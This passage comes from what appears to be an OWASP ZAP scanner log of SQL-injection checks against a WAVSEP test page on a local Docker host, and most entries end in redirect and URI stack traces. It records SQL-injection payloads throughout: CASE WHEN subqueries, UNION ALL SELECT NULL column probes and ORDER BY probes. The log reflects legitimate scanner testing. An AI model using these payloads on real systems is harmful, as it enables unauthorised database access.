org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680029 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (1730=7392) THEN 1730 ELSE 1730*(SELECT 1730 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (1730=7392) THEN 1730 ELSE 1730*(SELECT 1730 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680030 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680031 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (6824=6824) THEN 6824 ELSE 6824*(SELECT 6824 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (6824=6824) THEN 6824 ELSE 6824*(SELECT 6824 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680032 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CASE WHEN (1730=7392) THEN 1730 ELSE 1730*(SELECT 1730 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/(SELECT (CASE WHEN (1730=7392) THEN 1730 ELSE 1730*(SELECT 1730 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680032 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680034 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680035 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680036 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680037 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680039 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680041 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680042 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680043 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 9461#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 